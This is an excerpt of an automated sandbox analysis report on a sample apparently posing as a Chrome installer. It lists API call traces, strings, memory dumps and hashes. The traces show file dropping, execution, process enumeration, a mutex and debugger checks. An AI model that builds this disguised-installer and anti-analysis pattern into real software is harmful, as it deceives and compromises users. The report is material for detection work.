                                                                                                  • GetSystemMetrics.USER32(00000000), ref: 10001812
                                                                                                  • CreateWindowExW.USER32(00000000,?,?,00C40000,?,?,00000190,00000078,00000000,00000000,00000000,00000000), ref: 1000185E
                                                                                                  • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?,10017426), ref: 1000186D
                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 10001894
                                                                                                  • TranslateMessage.USER32(?), ref: 100018A2
                                                                                                  • DispatchMessageW.USER32(?), ref: 100018AC
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateMessageMetricsSystemWindow$CallbackClassDispatchDispatcherFolderFreeHandleKnownModulePathRegisterShowTaskThreadTranslateUserwcstombs
                                                                                                  • String ID: ChromeSetup.exe$URLDownloader
                                                                                                  • API String ID: 73900685-4101260699
                                                                                                  • Opcode ID: e2c4abd069d022b3f62bc688cf9d5a6553670ba20d304f4198ffeaec2c1a15ca
                                                                                                  • Instruction ID: 8631f2352c9d4e8355fdf3fc5455be072e9b283b4b7067b2d869b395449685d5
                                                                                                  • Opcode Fuzzy Hash: e2c4abd069d022b3f62bc688cf9d5a6553670ba20d304f4198ffeaec2c1a15ca
                                                                                                  • Instruction Fuzzy Hash: 807110B5D00218EFEB54CFA4CC45FDEBBB4EB48700F108169E619A7295EB74AA44CF51

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • InitCommonControlsEx.COMCTL32(00000008), ref: 10001903
                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 1000190D
                                                                                                  • CreateWindowExW.USER32(00000000,msctls_progress32,00000000,50800001,00000014,0000001E,00000159,00000014,00000001,00000065,00000000), ref: 10001933
                                                                                                  • SetWindowTheme.UXTHEME(00030420,10018438,10018434), ref: 1000194E
                                                                                                  • SendMessageW.USER32(00030420,00000409,00000000,00D77800), ref: 10001967
                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(0000000C), ref: 10001978
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_000019F0,?,00000000,00000000), ref: 100019B9
                                                                                                  • PostQuitMessage.USER32(00000000), ref: 100019C4
                                                                                                  • DefWindowProcW.USER32(00000002,?,?,?), ref: 100019DD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$CreateMessage$CommonControlsHandleInitModulePostProcQuitSendThemeThreadmalloc
                                                                                                  • String ID: $msctls_progress32
                                                                                                  • API String ID: 1181878002-3669180086
                                                                                                  • Opcode ID: f1c3b5bd482cc1038fd523d6cd0664b2522f3065c76e0cbb8d44deae0c0665e8
                                                                                                  • Instruction ID: 07dac4f513f804ff03a6516b31f22f63e0bdfab53d31000085bea38267b703f6
                                                                                                  • Opcode Fuzzy Hash: f1c3b5bd482cc1038fd523d6cd0664b2522f3065c76e0cbb8d44deae0c0665e8
                                                                                                  • Instruction Fuzzy Hash: 03310675A40218FFF750CF94CC9AFAA77B4FB48701F208118FA05AA290C770DA00CB65

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                    • Part of subcall function 100054B0: SHGetFolderPathA.SHELL32(00000000,10015860,00000000,00000000,?), ref: 100054D1
                                                                                                    • Part of subcall function 10015750: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10015783
                                                                                                    • Part of subcall function 10015700: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1001571E
                                                                                                  • _Smanip.LIBCPMTD ref: 10015B0A
                                                                                                  • _Smanip.LIBCPMTD ref: 10015BA4
                                                                                                  • memset.VCRUNTIME140(?,00000000,00000038,?,?,?,0000002F,?,00000070,?), ref: 10015C85
                                                                                                  • ShellExecuteExA.SHELL32(0000003C,?,?,?,?,?,?,0000002F,?,00000070,?), ref: 10015CE1
                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,0000002F,?,00000070,?), ref: 10015CFD
                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,0000002F,?,00000070,?), ref: 10015D0A
                                                                                                  • CopyFileA.KERNEL32(00000000,?,00000000), ref: 10015D73
                                                                                                  • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 10015D99
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$ExecuteModuleNameShellSmanip$CloseCopyFolderHandleObjectPathSingleWaitmemset
                                                                                                  • String ID: %s\%s$open
                                                                                                  • API String ID: 1049494684-538903891
                                                                                                  • Opcode ID: 0874a88fbfece6f8bf1c8d8ced0699038052d698083af6ca92b648841300b0f5
                                                                                                  • Instruction ID: 9eb432f15a048c8dfdefea35090f5a4ff5850cd705bbf9561c51413f96cb23ad
                                                                                                  • Opcode Fuzzy Hash: 0874a88fbfece6f8bf1c8d8ced0699038052d698083af6ca92b648841300b0f5
                                                                                                  • Instruction Fuzzy Hash: 48021374C083D8DEEB11CBA4C859BDDBFB5AF15304F0441D9D1496B282DBBA5B88CB62

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,100185DC), ref: 10015E0A
                                                                                                  • GetLastError.KERNEL32 ref: 10015E13
                                                                                                  • CloseHandle.KERNEL32(?), ref: 10015E24
                                                                                                  • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10015E2C
                                                                                                  • GetCurrentThread.KERNEL32 ref: 10015E3C
                                                                                                  • WaitForSingleObject.KERNEL32(00000000), ref: 10015E43
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,1000B570,00000000,00000000,00000000), ref: 10015E58
                                                                                                  • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10015E65
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateThreadexit$CloseCurrentErrorHandleLastMutexObjectSingleWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 355449500-0
                                                                                                  • Opcode ID: 932af6c73dcd6bb60c1c2832b1bdd1deeeb21924d37d70f5ea829a4b8e9779f7
                                                                                                  • Instruction ID: 0f97a28617a5a68d27cb6afa5f47f3953ca9a481207b566471c0f9ba98c6beaf
                                                                                                  • Opcode Fuzzy Hash: 932af6c73dcd6bb60c1c2832b1bdd1deeeb21924d37d70f5ea829a4b8e9779f7
                                                                                                  • Instruction Fuzzy Hash: 69014430A84318FBF791ABF08C4EB4D3A65EB08703F104440F709AE1D0CAB5D7848B25

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • Sleep.KERNEL32(000003E8), ref: 1000291A
                                                                                                    • Part of subcall function 10001E30: VariantInit.OLEAUT32(?), ref: 10001EAA
                                                                                                  • Sleep.KERNEL32(000003E8), ref: 1000287F
                                                                                                    • Part of subcall function 10001FA0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10001FAD
                                                                                                  • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10002928
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Sleep$CreateInitSnapshotToolhelp32Variantexit
                                                                                                  • String ID: .NET Framework Action$.NET Framework Action$.NET Framework Action$ChromeSetup.exe
                                                                                                  • API String ID: 4205734914-284283187
                                                                                                  • Opcode ID: 76a2244d046801374e69f27d23f782b19679ddba291410d41aa7a00bfad43085
                                                                                                  • Instruction ID: 01e91d36be03056c32c976757ddfbd5278b963073b9274932eac54e5bb7bc252
                                                                                                  • Opcode Fuzzy Hash: 76a2244d046801374e69f27d23f782b19679ddba291410d41aa7a00bfad43085
                                                                                                  • Instruction Fuzzy Hash: C321ACB4C01218EBEB14CFA0DC99BEEB770FF45391F504298F4052A28ADB34AB44CB51

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140 ref: 10012FBA
                                                                                                  • ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140(00000000), ref: 10012FE7
                                                                                                  • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,00000040,00000022,?), ref: 10013068
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_ostream@?setstate@?$basic_ios@D@std@@@1@_V?$basic_streambuf@
                                                                                                  • String ID:
                                                                                                  • API String ID: 2185338108-0
                                                                                                  • Opcode ID: 88d071829cc17b632e2f1fa59299d32dbac0b10e089369fb1704501315f6ea19
                                                                                                  • Instruction ID: 106bc35cbdd57d80b480a718a0c65df66589e39bca71049decacc3f2370ba628
                                                                                                  • Opcode Fuzzy Hash: 88d071829cc17b632e2f1fa59299d32dbac0b10e089369fb1704501315f6ea19
                                                                                                  • Instruction Fuzzy Hash: AB313CB4A0021ADFDB04CF98CD91BAEB7B5FF48704F108658E916AB391C771AA41CB91

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • SHGetKnownFolderPath.SHELL32(10018310,00000000,00000000,00000000), ref: 1000148B
                                                                                                  • wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,00000104), ref: 100014AA
                                                                                                  • CoTaskMemFree.OLE32(00000000,00000000,?), ref: 100014DE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FolderFreeKnownPathTaskwcstombs
                                                                                                  • String ID:
                                                                                                  • API String ID: 2577077003-0
                                                                                                  • Opcode ID: 493dfbf237c9a535aafa1e804c9f1c3c3366dd009bb43d7c840f6e417707dc2e
                                                                                                  • Instruction ID: 90efd60632e2d823e52567890d799542f586c4bd548bb1fa8c7a4ffe1eb11bac
                                                                                                  • Opcode Fuzzy Hash: 493dfbf237c9a535aafa1e804c9f1c3c3366dd009bb43d7c840f6e417707dc2e
                                                                                                  • Instruction Fuzzy Hash: 4D2117B1940219EBEB00DF94CC95BEEBBB4FB08740F108529F515AB290DB74AB45CB90

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • ??Bios_base@std@@QBE_NXZ.MSVCP140(?,00000022,00000040,00000001), ref: 1000534A
                                                                                                  • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J@Z.MSVCP140(1000A5BB,000000FF,?), ref: 10005384
                                                                                                    • Part of subcall function 10012400: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,?,10005395), ref: 1001242D
                                                                                                  • SetFileAttributesA.KERNEL32(00000000,00000001), ref: 100053A0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: D@std@@@std@@U?$char_traits@$?setstate@?$basic_ios@?write@?$basic_ostream@AttributesBios_base@std@@FileV12@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1581416325-0

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • ?_Fiopen@std@@YAPAU_iobuf@@PBDHH@Z.MSVCP140(00000022,00000040,1001304F,000000FF,?,1001304F,00000040,00000022,?), ref: 100135F7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Fiopen@std@@U_iobuf@@
                                                                                                  • String ID:
                                                                                                  • API String ID: 2284775142-0

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1098 10012f10-10012f20 1099 10012f63 1098->1099 1100 10012f22-10012f3d call 10012c90 call 10012d20 1098->1100 1101 10012f6a-10012f7c call 10012e40 1099->1101 1108 10012f46-10012f58 fclose 1100->1108 1109 10012f3f 1100->1109 1110 10012f61 1108->1110 1111 10012f5a 1108->1111 1109->1108 1110->1101 1111->1110
                                                                                                  APIs
                                                                                                    • Part of subcall function 10012C90: ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(100053B9,?,10012F2A,?,100053B9), ref: 10012C9A
                                                                                                    • Part of subcall function 10012C90: ?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00@Z.MSVCP140(CCC35DE5,CCC35DE5,8B55CCCC,?,10012F2A,?,100053B9), ref: 10012CC2
                                                                                                  • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(0175FE68,?,100053B9), ref: 10012F4D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: D@std@@@std@@U?$char_traits@$?eback@?$basic_streambuf@?setg@?$basic_streambuf@D00@fclose
                                                                                                  • String ID:
                                                                                                  • API String ID: 2996004546-0

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1112 100054b0-100054d9 SHGetFolderPathA 1113 100054fa-10005510 call 10002da0 1112->1113 1114 100054db-100054f6 call 10002da0 1112->1114 1119 10005513-10005516 1113->1119 1114->1119
                                                                                                  APIs
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,10015860,00000000,00000000,?), ref: 100054D1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FolderPath
                                                                                                  • String ID:
                                                                                                  • API String ID: 1514166925-0

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                    • Part of subcall function 10012F10: fclose.API-MS-WIN-CRT-STDIO-L1-1-0(0175FE68,?,100053B9), ref: 10012F4D
                                                                                                  • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,?,10005395), ref: 1001242D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ?setstate@?$basic_ios@D@std@@@std@@U?$char_traits@fclose
                                                                                                  • String ID:
                                                                                                  • API String ID: 2040537880-0
                                                                                                  APIs
                                                                                                  • DeleteFileA.KERNEL32(1000A58A,?,1000A58A,00000000,?,?,?,0000005C,?), ref: 10005527
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DeleteFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 4033686569-0
                                                                                                  APIs
                                                                                                  • SetFileAttributesA.KERNEL32(00000000,00000080,?,1000B3D6,?,00000000), ref: 10005751
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 3188754299-0
                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 008D18E4
                                                                                                  • CreateWindowExW.USER32(00000000,10018410,00000000,50800001,00000014,0000001E,00000159,00000014,00000001,00000065,00000000), ref: 008D190A
                                                                                                  • SendMessageW.USER32(1001C6F0,00000409,00000000,00D77800), ref: 008D193E
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,100019F0,?,00000000,00000000), ref: 008D1990
                                                                                                  • PostQuitMessage.USER32(00000000), ref: 008D199B
                                                                                                  • NtdllDefWindowProc_W.NTDLL(00000002,?,?,?), ref: 008D19B4
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1734162605.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_8d0000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateMessageWindow$HandleModuleNtdllPostProc_QuitSendThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 4292518056-3916222277
                                                                                                  APIs
                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10001FAD
                                                                                                  • memset.VCRUNTIME140(?,00000000,00000228), ref: 10001FDB
                                                                                                  • Process32FirstW.KERNEL32(000000FF,0000022C), ref: 10001FEE
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000), ref: 10002015
                                                                                                  • CloseHandle.KERNEL32(000000FF,?,?), ref: 10002055
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharCloseCreateFirstHandleMultiProcess32SnapshotToolhelp32Widememset
                                                                                                  • String ID:
                                                                                                  • API String ID: 3952204985-0
                                                                                                  APIs
                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,00000001), ref: 10016A6A
                                                                                                  • memset.VCRUNTIME140(?,00000000,00000003), ref: 10016A90
                                                                                                  • memset.VCRUNTIME140(?,00000000,00000050), ref: 10016B1A
                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 10016B36
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 10016B4F
                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 10016B59
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
                                                                                                  • String ID:
                                                                                                  • API String ID: 1045392073-0
                                                                                                  APIs
                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 008E6A41
                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 008E6B0D
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 008E6B26
                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 008E6B30
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1734162605.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_8d0000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                  • String ID:
                                                                                                  • API String ID: 254469556-0
                                                                                                  • Opcode ID: f2824bad1c03e64228532995a74806979f2a3e591e50c28ff2d2bcfbf7cad9c5
                                                                                                  • Instruction ID: b10db7d082a946398cac6c7ea06779dba3c6df3a4745fdbd01669e6f83809874
                                                                                                  • Opcode Fuzzy Hash: f2824bad1c03e64228532995a74806979f2a3e591e50c28ff2d2bcfbf7cad9c5
                                                                                                  • Instruction Fuzzy Hash: 4E31F8B5D052289BDB61DFA5C9897CDBBB8FF08300F1041AAE40DEB250E7709B848F45
                                                                                                  APIs
